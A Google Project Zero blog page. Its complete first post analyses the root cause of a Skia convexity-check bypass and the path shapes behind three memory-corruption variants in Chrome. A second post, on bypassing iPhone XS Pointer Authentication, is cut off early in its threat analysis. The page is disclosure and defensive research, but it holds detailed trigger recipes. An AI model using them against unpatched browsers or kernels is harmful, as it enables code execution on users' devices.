
The Curious Case of Convexity Confusion

5 February 2019 - 19:08
Posted by Ivan Fratric, Google Project Zero
Intro
Some time ago, I noticed a tweet about an externally reported vulnerability in the Skia graphics library (used by Chrome, Firefox and Android, among others). The vulnerability caught my attention for several reasons:
Firstly, I had looked at Skia before in the context of finding precision issues, and any bug in code I have already reviewed instantly evokes the “What did I miss?” question in my head.
Secondly, the bug was described as a stack-based buffer overflow, and you don’t see many bugs of this type anymore, especially in web browsers.
And finally, while the bug itself was found by fuzzing and didn’t come with much in the way of root cause analysis, a part of the fix involved changing the floating point precision from single to double, which is something I argued against in the previous blog post on precision issues in graphics libraries.
So I wondered what the root cause was and if the patch really addressed it, or if other variants could be found. As it turned out, there were indeed other variants, resulting in stack and heap out-of-bounds writes in the Chrome renderer.
Geometry for exploit writers
To understand what the issue was, let’s quickly cover some geometry basics we’ll need later. This is all pretty basic stuff, so if you already know some geometry, feel free to skip this section.
A convex polygon is a polygon with the following property: you can take any two points inside the polygon, and if you connect them, the resulting line segment will be entirely contained within the polygon. A concave polygon is a polygon that is not convex. This is illustrated in the following images:
Image 1: An example of a convex polygon
Image 2: An example of a concave polygon
A polygon is monotone with respect to the Y axis (also called y-monotone) if every horizontal line intersects it at most twice. Another way to describe a y-monotone polygon is: if we traverse the points of the polygon from its topmost to its bottommost point (or the other way around), the y coordinates of the points we encounter are always going to decrease (or always increase), never alternating directions. This is illustrated by the following examples:
Image 3: An example of a y-monotone polygon
Image 4: An example of a non-y-monotone polygon

A polygon can also be x-monotone if every vertical line intersects it at most twice. A convex polygon is both x- and y-monotone, but the converse is not true: a monotone polygon can be concave, as illustrated in Image 3.
All of the concepts above can easily be extended to other curves, not just polygons (which are made entirely from line segments).
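To make the definition concrete, here is a minimal sketch (my own illustration, not Skia code) that checks y-monotonicity of a closed polygon by counting how often the sign of the y-delta flips while walking the vertex cycle:

#include <vector>

struct Point { float x, y; };

bool isYMonotone(const std::vector<Point>& poly) {
    int n = (int)poly.size();
    int signChanges = 0, prevSign = 0;
    for (int i = 0; i < n; i++) {
        float dy = poly[(i + 1) % n].y - poly[i].y;
        int sign = (dy > 0) - (dy < 0);
        if (sign == 0) continue;               // horizontal edge: no direction info
        if (prevSign != 0 && sign != prevSign) signChanges++;
        prevSign = sign;
    }
    // A y-monotone cycle has one descending and one ascending run, so at most
    // two sign flips are seen in a single linear pass (degenerate polygons are
    // not handled here).
    return signChanges <= 2;
}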
A polygon can be transformed by transforming all of its points. A so-called affine transformation is a combination of scaling, skew and translation (note that affine transformations also include rotation, because rotation can be expressed as a combination of scale and skew). An affine transformation has the property that, when it is used to transform a convex shape, the resulting shape must also be convex.
For the readers with a basic knowledge of linear algebra: a transformation can be represented in the form of a matrix, and the transformed coordinates can be computed by multiplying the matrix with a vector representing the original coordinates. Transformations can be combined by multiplying matrices. For example, if you multiply a rotation matrix and a translation matrix, you’ll get a transformation matrix that includes both rotation and translation. Depending on the multiplication order, either rotation or translation is going to be applied first.
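As a concrete sketch (generic 3x3 matrices, not Skia's SkMatrix API), here is how two transforms compose via matrix multiplication, with the multiplication order deciding which transform is applied to a point first:

#include <array>
#include <cmath>

using Mat3 = std::array<std::array<double, 3>, 3>;   // row-major, column vectors

Mat3 mul(const Mat3& a, const Mat3& b) {
    Mat3 r{};
    for (int i = 0; i < 3; i++)
        for (int j = 0; j < 3; j++)
            for (int k = 0; k < 3; k++)
                r[i][j] += a[i][k] * b[k][j];
    return r;
}

Mat3 rotation(double t) {
    return {{{std::cos(t), -std::sin(t), 0},
             {std::sin(t),  std::cos(t), 0},
             {0, 0, 1}}};
}

Mat3 translation(double tx, double ty) {
    return {{{1, 0, tx}, {0, 1, ty}, {0, 0, 1}}};
}

// mul(translation(tx, ty), rotation(t)) rotates first, then translates;
// mul(rotation(t), translation(tx, ty)) translates first, then rotates.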
The bug
Back to the bug: after analyzing it, I found out that it was triggered by a malformed RRect (a rectangle with curved corners where the user can specify a radius for each corner). In this case, tiny values were used as RRect parameters, which caused precision issues when the RRect was converted into a path object (a more general shape representation in Skia which can consist of both line and curve segments). The result was that, after the RRect was converted to a path and transformed, the resulting shape didn’t look like an RRect at all - it was concave.
At the same time, Skia assumes that every RRect must be convex, so when the RRect is converted to a path, it sets the convexity attribute on the path to kConvex_Convexity (for RRects this happens in the helper class SkAutoPathBoundsUpdate).
Why is this a problem? Because Skia has different drawing algorithms, some of which only work for convex paths. And, unfortunately, using algorithms for drawing convex paths when the path is concave can result in memory corruption. This is exactly what happened here.
Skia developers fixed the bug by addressing the RRect-specific computations: they increased the precision of some calculations performed when converting RRects to paths and also made sure that any RRect corner with a tiny radius would be treated as if the radius were 0. Possibly (I haven’t checked), this makes sure that converting an RRect to a path won’t result in a concave shape.
However, another detail caught my attention:
Initially, when the RRect was converted into a path, it might have been concave, but the concavities were so tiny that they wouldn’t cause any issues when the path was rendered. At some point the path was transformed which caused the concavities to become more pronounced (the path was very clearly concave at this point). And yet, the path was still treated as convex. How could that be?
The answer: the transformation used was an affine transform, and Skia respects the mathematical property that transforming a shape with an affine transform cannot change its convexity; so, when using an affine transform to transform a path, it copies the convexity attribute to the resulting path object.
This means that if we can convince Skia a path is convex when in reality it is not, and we apply any affine transform to the path, the resulting path will also be treated as convex. The affine transform can be crafted so that it enlarges, rotates and positions the concavities such that, once the convex drawing algorithm is used on the path, memory corruption is triggered.
Additionally (I haven’t tested this), it might be possible that, due to precision errors, computing a transformation itself introduces tiny concavities when there were none previously. These concavities might then be enlarged in subsequent path transformations.
Unfortunately for computational geometry coders everywhere, accurately determining whether a path is convex in floating point (regardless of whether single or double precision is used) is very difficult, bordering on impossible. So, how does Skia do it? Convexity computations in Skia happen in the Convexicator class, where Skia uses several criteria to determine if a path is convex:
  • It traverses a path and computes changes of direction. For example, if we follow a path and always turn left (or always turn right), the path must be convex (a sketch of this check follows the list).

  • It checks if a path is both x- and y-monotone

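To see how the first criterion can be fooled, consider this minimal sketch of a direction-change test (my own simplification, not the actual Convexicator code; the tolerance value is made up for illustration). Note how the tolerance makes the check deliberately blind to near-zero turns, which is exactly where tiny concavities slip through:

#include <vector>
#include <cmath>

struct Pt { float x, y; };

bool looksConvex(const std::vector<Pt>& poly) {
    const float kTolerance = 1e-10f;   // illustrative only, not Skia's value
    int sign = 0;
    int n = (int)poly.size();
    for (int i = 0; i < n; i++) {
        Pt a = poly[i], b = poly[(i + 1) % n], c = poly[(i + 2) % n];
        // Cross product of consecutive edge vectors: its sign is the turn direction.
        float cross = (b.x - a.x) * (c.y - b.y) - (b.y - a.y) * (c.x - b.x);
        if (std::fabs(cross) < kTolerance) continue;   // "too small to matter"
        int s = cross > 0 ? 1 : -1;
        if (sign == 0) sign = s;
        else if (s != sign) return false;              // direction flipped: concave
    }
    return true;   // never turned both ways, so declared convex
}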
When analyzing this Convexicator class, I noticed two cases where a concave path might pass as convex:
  1. As can be seen here, any pair of points for which the squared distance does not fit in a 32-bit float (i.e. the distance between the points is smaller than ~3.74e-23) will be completely ignored. This, of course, includes sequences of points which form concavities (a short demo of this underflow follows the list).

  2. Due to tolerances when computing direction changes (e.g. here and here), even concavities significantly larger than 3.74e-23 can easily pass the convexity check (I experimented with values around 1e-10). However, such concavities must also pass the x- and y-monotonicity check.

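The ~3.74e-23 threshold in case 1 is simply the square root of the smallest positive (denormal) 32-bit float, ~1.4e-45: distances much below it square to values that round to zero. A quick demonstration (assumes default IEEE rounding, no flush-to-zero):

#include <cstdio>
#include <cfloat>

int main() {
    float dx = 1e-23f, dy = 0.0f;        // points closer than ~3.74e-23
    float distSq = dx * dx + dy * dy;    // 1e-46 underflows to 0.0f
    printf("FLT_TRUE_MIN = %g\n", (double)FLT_TRUE_MIN);
    printf("distSq = %g, ignored: %s\n", (double)distSq,
           distSq == 0.0f ? "yes" : "no");
    return 0;
}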
Note that, in both cases, a path needs to have some larger edges (for which direction can be properly computed) in order to be declared convex, so just having a tiny path is not sufficient. Fortunately, a line is considered convex by Skia, so it is sufficient to have a tiny concave shape and a single point at a sufficient distance away from it for a path to be declared convex.
Alternatively, by combining both issues above, one can have tiny concavities along the line, which is a technique I used to create paths that are both small and clearly concave when transformed (note: the size of the path is often a factor when determining which algorithms can handle which paths).
To make things clearer, let’s see an example of bypassing the convexity check with a polygon that is both x- and y-monotone. Consider the polygon in Image 5 (a) and imagine that the part inside the red circle is much smaller than depicted. Note that this polygon is concave, but it is also both x-monotone and y-monotone. Thus, if the concavity depicted in the red circle is sufficiently small, the polygon is going to be declared convex.
Now, let’s see what we can do with it by applying an affine transform - firstly, we can rotate it and make it non-y-monotone as depicted in Image 5 (b). Having a polygon that is not y-monotone will be very important for triggering memory corruption issues later.
Secondly, we can scale (enlarge) and translate the concavity to fill the whole drawing area; when the concavity is intersected with the drawing area, we end up with something like what is depicted in Image 5 (c), where the polygon is clearly concave and the concavity is no longer small.
(a)
(b)
(c)
Image 5: Bypassing the convexity check with a monotone polygon
The walk_convex_edges algorithm
Now that we can bypass the convexity check in various ways, let’s see how it can lead to problems. To understand this, let’s first examine how Skia’s algorithm for drawing (filling) convex paths works (code here). Consider the example in Image 6 (a). The first thing Skia does is extract the polygon (path) lines (edges) and sort them according to the coordinates of the topmost point. The sorting order is top-to-bottom, and if two points have the same y coordinate, then the one with the smaller x coordinate goes first. This has been done for the polygon in Image 6 (a), and the numbers next to the edges depict their order. The bottommost edge is ignored because it is fully horizontal and thus not needed (you’ll see why in a moment).
Next, the edges are traversed and the area between them drawn. First, the first two edges (edges 1 and 2) are taken and the area between them is filled from top to bottom - this is the red area in Image 6 (b). After this, edge 1 is “done” and is replaced by the next edge - edge 3. Now, the area between edges 2 and 3 is filled (orange area). Next, edge 2 is “done” and is replaced by the next in line: edge 4. Finally, the area between edges 3 and 4 is rendered. Since there are no more edges, the algorithm stops.

(a)
(b)
Image 6: Skia convex path filling algorithm
Note that, in the implementation, the code for rendering areas where both edges are vertical (here) is different from the code for rendering areas where at least one edge is at an angle (here). In the first case, the whole area is rendered in a single call to blitter->blitRect(), while in the second case, the area is rendered line-by-line and blitter->blitH() is called for each line. Of special interest here is the local_top variable, which essentially keeps track of the next y coordinate to fill. In the case of drawing non-vertical edges, it is simply incremented for every line drawn. In the case of vertical lines (drawing a rectangle), after the rectangle is drawn, local_top is set based on the coordinates of the current edge pair. This difference in behavior is going to be useful later.
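The two rendering paths and their different handling of local_top can be modeled as follows (my own sketch of the logic described above, not Skia’s code; printf stands in for the blitter calls and Edge for Skia’s edge records):

#include <cstdio>

struct Edge {
    float x0, y0, x1, y1;
    bool vertical() const { return x0 == x1; }
    float xAt(float y) const { return x0 + (x1 - x0) * (y - y0) / (y1 - y0); }
};

// Fill the area between the current left/right edge pair, from local_top down
// to `bottom` (where one of the edges ends and gets replaced by the next one).
void fillBetween(const Edge& l, const Edge& r, int& local_top, int bottom) {
    if (l.vertical() && r.vertical()) {
        // Rectangle case: one blitRect call, then local_top is reset from the
        // edge coordinates.
        printf("blitRect x=[%g,%g) y=[%d,%d)\n", l.x0, r.x0, local_top, bottom);
        local_top = bottom;
    } else {
        // Slanted case: one blitH call per line, local_top simply increments.
        for (; local_top < bottom; local_top++)
            printf("blitH y=%d x=[%g,%g)\n", local_top,
                   l.xAt(local_top + 0.5f), r.xAt(local_top + 0.5f));
    }
}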
One interesting observation about this algorithm is that it would work correctly not only for convex paths but for all paths that are y-monotone. Using it for y-monotone paths would also have another benefit: checking if a path is y-monotone can be done faster and more accurately than checking if a path is convex.
Variant 1
Now, let’s see how drawing concave paths using this algorithm can lead to problems. As the first example, consider the polygon in Image 7 (a) with the edge ordering marked.
(a)
(b)
Image 7: An example of a concave path that causes problem in Skia if rendered as convex
Image 7 (b) shows how the shape is rendered. First, a large red area between edges 1 and 2 is rendered. At this point, both edges 1 and 2 are done, and the orange rectangular area between edges 3 and 4 is rendered next. The purpose of this rectangular area is simply to reset the local_top variable to its correct value (here); otherwise local_top would just continue increasing for every line drawn. Next, the green area between edges 3 and 5 is drawn - and this causes problems. Why?
Because Skia expects to always draw pixels in a top-to-bottom, left-to-right order; e.g. point (x, y) = (1, 1) is always going to be drawn before (1, 2), and (1, 1) is also always going to be drawn before (2, 1).
However, in the example above, the area between edges 1 and 2 will (partially) cover the same y values as the area between edges 3 and 5. The second area is going to be drawn, well, second, and yet it contains some of the same y coordinates as the first region, with lower x coordinates.
Now let’s see how this leads to memory corruption. In the original bug, a concave (but presumed convex) path was used as a clipping region (every subsequent draw call draws only inside the clipping region). When setting a path as a clipping region, it also gets “drawn”, but instead of drawing pixels on the screen, they just get saved so they can be intersected with whatever gets drawn afterwards. The pixels are saved in SkRgnBuilder::blitH - actually, individual pixels aren’t saved; instead, an entire range of pixels (from x to x + width at height y) gets stored at once to save space. These ranges - you guessed it - also depend on the correct drawing order, as can be seen here (among other places).
Now let’s see what happens when a second path is drawn inside a clipping region with incorrect ordering. If antialiasing is turned on when drawing the second path, SkRgnClipBlitter::blitAntiH gets called for every range drawn. This function needs to intersect the clip region ranges with the range being drawn and only output the pixels that are present in both. For that purpose, it gets the clipping ranges that intersect the line being drawn one by one and processes them. SkRegion::Spanerator::next is used to return the next clipping range.
Let’s assume the clipping region for the y coordinate currently drawn has the ranges [start x, end x] = [10, 20] and [0, 2] and the line being drawn is [15, 16]. Let’s also consider the following snippet of code from SkRegion::Spanerator::next:
    if (runs[0] >= fRight) {
        fDone = true;
        return false;
    }
   SkASSERT(runs[1] > fLeft);
    if (left) {
        *left = SkMax32(fLeft, runs[0]);
    }
    if (right) {
        *right = SkMin32(fRight, runs[1]);
    }
    fRuns = runs + 2;
    return true;
where left and right are the output pointers, fLeft and fRight are the left and right x values of the line being drawn (15 and 16 respectively), while runs is a pointer to the clipping region ranges that gets incremented in every iteration. For the first clipping range [10, 20] this is going to work correctly, but let’s see what happens for the range [0, 2]. Firstly, the part
    if (runs[0] >= fRight) {
        fDone = true;
        return false;
    }
is supposed to stop the algorithm, but due to the incorrect ordering, it does not (0 >= 16 is false). Next, left is computed as Max(15, 0) = 15 and right as Min(16, 2) = 2. Note how left is larger than right. This is going to result in calling SkAlphaRuns::Break with a negative count argument on the line
      SkAlphaRuns::Break((int16_t*)runs, (uint8_t*)aa, left - x, right - left);
which then leads to out-of-bounds write on the following lines in SkAlphaRuns::Break:
        x = count;
        ...
        alpha[x] = alpha[0];
Why did this result in an out-of-bounds write on the stack? Because, in the case of drawing only two pixels, the range arrays passed to SkRgnClipBlitter::blitAntiH and subsequently SkAlphaRuns::Break are allocated on the stack in SkBlitter::blitAntiH2 here.
Triggering the issue in a browser
This is great - we have a stack out-of-bounds write in Skia, but can we trigger this in Chrome? In general, in order to trigger the bug, the following conditions must be met:
  1. We control a path (SkPath) object
  2. Something must be done to the path object that computes its convexity
  3. The same path must be transformed and filled / set as a clip region

My initial idea was to use the CanvasRenderingContext2D API and render a path twice: once without any transform, just to establish its convexity, and a second time with a transformation applied to the CanvasRenderingContext2D object.
Unfortunately, this approach won’t work - when drawing a path, Skia is going to copy it before applying a transformation, even if there is effectively no transformation set (the transformation matrix is an identity matrix). So the convexity property is going to be set on a copy of the path, and not on the one we keep a reference to.
Additionally, Chrome itself makes a copy of the path object when calling any canvas functions that cause a path to be drawn, and all the other functions we can call with a path object as an argument do not check its convexity.
However, I noticed Chrome canvas still draws my convex/concave paths incorrectly - even if I just draw them once. So what is going on? As it turns out, when drawing a path using Chrome canvas, the path won’t be drawn immediately. Instead, Chrome just records the draw path operation using RecordPaintCanvas and all such draw operations will be executed together, at a later time. When a DrawPathOp object (representing a path drawing operation) is created, among other things, it is going to check if the path is “slow”, and one of the criteria for this is path convexity:
int DrawPathOp::CountSlowPaths() const {
  if (!flags.isAntiAlias() || path.isConvex())
    return 0;
  …
}
All of this happens before the path is transformed, so we seemingly have a perfect scenario: We control a path, its convexity is checked, and the same path object later gets transformed and rendered.
The second problem with canvas is that, in the previously described approach to converting the issue to memory corruption, we relied on SkRgnBuilder, which is only used when a clip region has antialiasing turned off, while everything in Chrome canvas is going to be drawn with antialiasing on. Chrome also implements the OffscreenCanvas API which sets clip antialiasing to off (I’m not sure if this is deliberate or a bug), but OffscreenCanvas does not use RecordPaintCanvas and instead draws everything immediately.
So the best way forward seemed to be to find some other variants of turning convexity issues into memory corruption, ones that would work with antialiasing on for all operations.
Variant 2
As it happens, Skia implements three different algorithms for path drawing with antialiasing on, and one of these (SkScan::SAAFillPath, using supersampled antialiasing) uses essentially the same filling algorithm we analyzed before. Unfortunately, this does not mean we can get to the same buffer overflow as before - as mentioned previously, SkRgnBuilder / SkRgnClipBlitter are not used with antialiasing on. However, we have other options.
If we simply fill the path (no clip region needed this time) with the correct algorithm, SuperBlitter::blitH is going to be called without respecting the top-to-bottom, left-to-right drawing order. SuperBlitter::blitH calls SkAlphaRuns::add and, as the last argument, passes the rightmost x coordinate we have drawn so far. This is subtracted from the currently drawn x coordinate on the line:
       x -= offsetX;
And if x is smaller than something we drew already (for the same y coordinate), it becomes negative. This is, of course, exactly what happens when drawing pixels out of Skia’s expected order.
The result of this is calling SkAlphaRuns::Break with a negative “x” argument. This skips the entire first part of the function (the “while (x > 0)” loop), and continues to the second part:
        runs = next_runs;
        alpha = next_alpha;
        x = count;

        for (;;) {
            int n = runs[0];
            SkASSERT(n > 0);

            if (x < n) {
                alpha[x] = alpha[0];
                runs[0] = SkToS16(x);
                runs[x] = SkToS16(n - x);
                break;
            }
            x -= n;
            if (x <= 0) {
                break;
            }
            runs += n;
            alpha += n;
        }

Here, x gets overwritten with count, but the problem is that runs[0] is not going to be initialized (the first part of the function is supposed to initialize it), so in
       int n = runs[0];
an uninitialized variable gets read into n and is used as an offset into arrays, which can result in both out-of-bounds read and out-of-bounds write when the following lines are executed:
        runs += n;
        alpha += n;

        alpha[x] = alpha[0];
        runs[0] = SkToS16(x);
        runs[x] = SkToS16(n - x);
The shape needed to trigger this is depicted in Image 8 (a).
(a)
(b)
Image 8: Shape used to trigger variant 2 in Chrome

This shape is similar to the one previously depicted, but there are some differences, namely:
  • We must render two ranges for the same y coordinate immediately one after another, where the second range is going to be to the left of the first range. This is accomplished by making the rectangular area between edges 3 and 4 (orange in Image 8 (b)) less than a pixel wide (so it does not in fact output anything) and making the area between edges 5 and 6 (green in the image) only a single pixel high.

  • The second range for the same y must not start at x = 0. This is accomplished by edge 5 ending a bit away from the left side of the image bounds.

This variant can be triggered in Chrome by simply drawing a path - the PoC can be seen here.
Variant 3
An uninitialized variable bug in a browser is nice, but not as nice as a stack out-of-bounds write, so I looked for more variants. For the next and final one, the path we need is a bit more complicated and can be seen in Image 9 (a) (note that the path is self-intersecting).
(a)
(b)
Image 9: A shape used to trigger a stack buffer overflow in Chrome
Let’s see what happens in this one (assume the same drawing algorithm is used as before): First, edges 1, 2, 3 and 4 are handled. This part is drawn incorrectly (only the red and orange areas in Image 9 (b) are filled), but the details aren’t relevant for triggering the bug. For now, just note that edges 2 and 4 terminate at the same height, so when they are done, edges 2 and 4 are both replaced with edges 5 and 6. The purpose of edges 5 and 6 is once again to reset the local_top variable - it will be set to the height shown as the red dotted line in the image. Now, edges 5 and 6 will both get replaced with edges 7 and 8 - and here is the issue: edges 7 and 8 are supposed to be drawn only for y coordinates between the green and blue lines. Instead, they are going to be rendered all the way from the red line to the blue line. Note the very low steepness of edges 7 and 8 - for every line, the x coordinates to draw to increase significantly and, given that the edges are drawn over a larger number of iterations than intended, the x coordinate will eventually spill past the image bounds.
This causes a stack out-of-bounds write if a path is drawn using the SkScan::SAAFillPath algorithm with MaskSuperBlitter. MaskSuperBlitter can only handle very small paths (up to 32x32 pixels) and contains a fixed-size buffer that is going to be filled with an 8-bit opacity value for each pixel of the path region. Since MaskSuperBlitter is a local variable in SkScan::SAAFillPath, the (fixed-size) buffer is going to be allocated on the stack. When the path above is drawn, there aren’t any bounds checks on the opacity buffer (there are only debug asserts here and here), which leads to an out-of-bounds write on the stack. Specifically (due to how the opacity buffer works), we can increment values on the stack past the end of the buffer by a small amount.
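To make the primitive concrete, here is a simplified model of the situation (my own illustration, not Skia’s code):

#include <cstdint>

// Simplified model of the MaskSuperBlitter primitive. In SkScan::SAAFillPath
// the real mask buffer lives in a local variable, i.e. on the stack.
struct MaskModel {
    uint8_t mask[32 * 32];   // the path must fit in 32x32 pixels
    int rowBytes = 32;

    void blitH(int x, int y, int width, uint8_t alpha) {
        // Only debug asserts guard the index; with the malformed path, x
        // spills past the row, so the += lands beyond the buffer: a small,
        // offset-influenced increment of stack memory.
        for (int i = 0; i < width; i++)
            mask[y * rowBytes + x + i] += alpha;
    }
};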
This variant is again triggerable in Chrome by simply drawing a path to the Canvas and gives us a pretty nice primitive for exploitation - note that this is not a linear overflow and offsets involved can be controlled by the slope of edges 7 and 8. The PoC can be seen here - most of it is just setting up the path coordinates so that the path is initially declared convex and at the same time small enough so that MaskSuperBlitter can render it.
How can the shape needed to trigger the bug appear convex to Skia and still fit in 32x32 pixels? Note that the shape is already x-monotone. Now assume we squash it in the y direction until it becomes (almost) a line lying on the x axis. It is still not y-monotone, because there are tiny shifts in the y direction along the line - but if we skew (or rotate) it just a tiny amount, so that it is no longer parallel to the x axis, it also becomes y-monotone. The only parts we can’t make monotone are the vertical edges (edges 5 and 6), but if the shape is squashed sufficiently, they become so short that their squared length does not fit in a float and they are ignored by the Skia convexity test. This is illustrated in Image 10. In reality these steps need to be followed in reverse, as we start with a shape that needs to pass the Skia convexity test and then transform it into the shape depicted in Image 9.
(a)
(b)
(c)
Image 10: Making the shape from Image 9 appear convex, (a) original shape, (b) shape after y-scale, (c) shape after y-scale and rotation

On fixing the issue
Initially, Skia developers attempted to fix the issue by not propagating convexity information after the transformation, but only in some cases. Specifically, the convexity was still propagated if the transformation consisted only of scale and translation. Such a fix is insufficient because very small concavities (where square distance between points is too small to fit in a 32-bit float) could still be enlarged using only scale transformation and could form shapes that would trigger memory corruption issues.
After talking to the Skia developers, a stronger patch was created, modifying the convex drawing algorithm in a way that passing concave shapes to it won’t result in memory corruption, but rather in returning from the draw operation early. This patch shipped, along with other improvements, in Chrome 72.
It isn’t uncommon that an initial fix for a vulnerability is insufficient. But the saving grace for Skia, Chrome and most open source projects is that the bug reporter can see the fix immediately when it’s created and point out the potential drawbacks. Unfortunately, this isn’t the case for many closed-source projects or even open-sourced projects where the bug fixing process is opaque to the reporter, which caused mishaps in the past. However, regardless of the vendor, we at Project Zero are happy to receive information on the fixes early and comment on them before they are released to the public.
Conclusion
There are several things worth highlighting about this bug. Firstly, computational geometry is hard. Seriously. I have some experience with it and, while I can’t say I’m an expert, I know that much at least. Handling all the special cases correctly is a pain, even without considering security issues. And doing it using floating point arithmetic might as well be impossible. If I were writing a graphics library, I would convert floats to fixed-point precision as soon as possible and wouldn’t trust anything computed based on floating-point arithmetic at all.
Secondly, the issue highlights the importance of doing variant analysis - I discovered it based on a public bug report and other people could have done the same.
Thirdly, it highlights the importance of defense-in-depth. The latest patch makes sure that drawing a concave path with convex path algorithms won’t result in memory corruption, which also addresses unknown variants of convexity issues. If this was implemented immediately after the initial report, Project Zero would now have one blog post less :-)

Examining Pointer Authentication on the iPhone XS

1 February 2019 - 20:25
Posted by Brandon Azad, Project Zero
In this post I examine Apple's implementation of Pointer Authentication on the A12 SoC used in the iPhone XS, with a focus on how Apple has improved over the ARM standard. I then demonstrate a way to use an arbitrary kernel read/write primitive to forge kernel PAC signatures for the A keys, which is sufficient to execute arbitrary code in the kernel using JOP. The technique I discovered was (mostly) fixed in iOS 12.1.3. In fact, this fix first appeared in the 16D5032a beta while my research was still ongoing.
ARMv8.3-A Pointer Authentication
Among the most exciting security features introduced with ARMv8.3-A is Pointer Authentication, a feature where the upper bits of a pointer are used to store a Pointer Authentication Code (PAC), which is essentially a cryptographic signature on the pointer value and some additional context. Special instructions have been introduced to add an authentication code to a pointer and to verify an authenticated pointer's PAC and restore the original pointer value. This gives the system a way to make cryptographically strong guarantees about the likelihood that certain pointers have been tampered with by attackers, which offers the possibility of greatly improving application security.
(Proper terminology dictates that the security feature is called Pointer Authentication while the cryptographic signature that is inserted into the unused bits of a pointer is called the Pointer Authentication Code, or PAC. However, popular usage has already confused these terms, and it is common to see Pointer Authentication referred to as PAC. Usually this usage is unambiguous, so for brevity I will often refer to Pointer Authentication as PAC as well.)
There are many great articles describing Pointer Authentication, so I'll only go over the rough details here. Interested readers can refer to Qualcomm's whitepaper, Mark Rutland's slides from the 2017 Linux Security Summit, this LWN article by Jonathan Corbet, and the ARM A64 Instruction Set Architecture for further details.
The key insight that makes Pointer Authentication viable is that, although pointers are 64 bits, most systems have a virtual address space that is much smaller, which leaves unused bits in a pointer that can be used to store additional data. In the case of Pointer Authentication, these bits will be used to store a short authentication code over both the original 64-bit pointer value and a 64-bit context value.
Systems are allowed to use an implementation-defined algorithm to compute PACs, but the standard recommends the use of a block cipher called QARMA. According to the whitepaper, QARMA is "a new family of lightweight tweakable block ciphers" designed specifically for pointer authentication. QARMA-64, the variant used in the standard, takes as input a secret 128-bit key, a 64-bit plaintext value (the pointer), and a 64-bit tweak (the context), and produces as output a 64-bit ciphertext. The truncated ciphertext becomes the PAC that gets inserted into the unused extension bits of the pointer.
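As a mental model (my own simplification, not ARM pseudocode; qarma64() is a hypothetical stand-in for the implementation-defined cipher, and a 39-bit virtual address space is assumed), PAC insertion looks roughly like this:

#include <cstdint>

// Hypothetical stand-in for the implementation-defined block cipher.
extern uint64_t qarma64(uint64_t ptr, uint64_t tweak, const uint8_t key[16]);

// Simplified model of PAC insertion for a pointer in the lower address range,
// ignoring pointer tagging (TBI). The real logic is AddPAC(), shown later.
uint64_t add_pac_model(uint64_t ptr, uint64_t context, const uint8_t key[16]) {
    const int va_bits = 39;    // assumed virtual address space size
    uint64_t cipher = qarma64(ptr, context, key);
    // Bits 63..39 are unused extension bits, except bit 55, which selects
    // between the upper and lower address ranges and is preserved.
    uint64_t pac_mask = (~0ULL << va_bits) & ~(1ULL << 55);
    return (ptr & ~pac_mask) | (cipher & pac_mask);
}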
The architecture provides for 5 secret 128-bit Pointer Authentication keys. Two of these keys, APIAKey and APIBKey, are used for instruction pointers. Another two, APDAKey and APDBKey, are used for data pointers. And the last key, APGAKey, is a special "general" key that is used for signing larger blocks of data with the PACGA instruction. Providing multiple keys allows for some basic protection against pointer substitution attacks, in which one authenticated pointer is substituted with another.
The values of these keys are set by writing to special system registers. The registers containing the Pointer Authentication keys are inaccessible from EL0, meaning that a userspace process cannot read or change them. However, the hardware provides no other key management features: it's up to the code running at each exception level to manage the keys for the next lower exception level.
ARMv8.3-A introduces three new categories of instructions for dealing with PACs:
  • PAC* instructions generate and insert the PAC into the extension bits of a pointer. For example, PACIA X8, X9 will compute the PAC for the pointer in register X8 under the A-instruction key, APIAKey, using the value in X9 as context, and then write the resulting PAC'd pointer back in X8. Similarly, PACIZA is like PACIA except the context value is fixed to 0.
  • AUT* instructions verify a pointer's PAC (along with the 64-bit context value). If the PAC is valid, then the PAC is replaced with the original extension bits. Otherwise, if the PAC is invalid (indicating that this pointer was tampered with), then an error code is placed in the pointer's extension bits so that a fault is triggered if the pointer is dereferenced. For example, AUTIA X8, X9 will verify the PAC'd pointer in X8 under the A-instruction key using X9 as context, writing the valid pointer back to X8 if successful and writing an invalid value otherwise.
  • XPAC* instructions remove a pointer's PAC and restore the original value without performing verification.

In addition to these general Pointer Authentication instructions, a number of specialized variants were introduced to combine Pointer Authentication with existing operations:
  • BLRA* instructions perform a combined authenticate-and-branch operation: the pointer is validated and then used as the branch target for BLR. For example, BLRAA X8, X9 will authenticate the PAC'd pointer in X8 under the A-instruction key using X9 as context and then branch to the resulting address.
  • LDRA* instructions perform a combined authenticate-and-load operation: the pointer is validated and then data is loaded from that address. For example, LDRAA X8, X9 will validate the PAC'd pointer in X9 under the A-data key using a context value of 0 and then load the 64-bit value at the resulting address into X8.
  • RETA* instructions perform a combined authenticate-and-return operation: the link register LR is validated and then RET is performed. For example, RETAB will verify LR using the B-instruction key and then return.
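On hardware and toolchains that support ARMv8.3 (e.g. compiling with -march=armv8.3-a or -arch arm64e), the sign/authenticate pair from the lists above can be exercised directly. A minimal sketch using the raw instructions (not Apple's <ptrauth.h> intrinsics):

#include <cstdint>

static inline uint64_t pacia(uint64_t ptr, uint64_t ctx) {
    asm("pacia %0, %1" : "+r"(ptr) : "r"(ctx));   // insert PAC under APIAKey
    return ptr;
}

static inline uint64_t autia(uint64_t ptr, uint64_t ctx) {
    asm("autia %0, %1" : "+r"(ptr) : "r"(ctx));   // verify and strip the PAC;
    return ptr;                                   // an invalid PAC poisons ptr
}

// pacia(p, ctx) followed by autia(..., ctx) round-trips to p; authenticating
// with the wrong context yields a pointer that faults when dereferenced.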
A known limitation: signing gadgets
Before we start our analysis of PAC, I should mention a known limitation: PAC can be bypassed if an attacker with read/write access can coerce the system into executing a signing gadget. Signing gadgets are instruction sequences that can be used to sign arbitrary pointers. For example, if an attacker can trigger the execution of a function that reads a pointer from memory, adds a PAC, and writes it back, then they can use this function as a signing oracle to forge PACs for arbitrary pointers.
Weaknesses against kernel attackers
As discussed in the Qualcomm whitepaper, ARMv8.3 Pointer Authentication was designed to provide some protection even against attackers with arbitrary memory read or arbitrary memory write capabilities. But it's important to understand the limitations of the design under the attack model we're considering: a kernel attacker who already has read/write and is looking to execute arbitrary code by forging PACs on kernel pointers.
Looking at the specification, I identified three potential weaknesses in the design when protecting against kernel attackers with read/write: reading the PAC keys from memory, signing kernel pointers in userspace, and signing A-key pointers using the B-key (or vice versa). We'll discuss each in turn.
Reading PAC keys from kernel memory
First let's consider what is perhaps the most obvious type of attack: just reading the PAC keys from kernel memory and then manually computing PACs for arbitrary kernel pointers. Here's an excerpt from the subsection of the whitepaper on attackers who can read arbitrary memory:
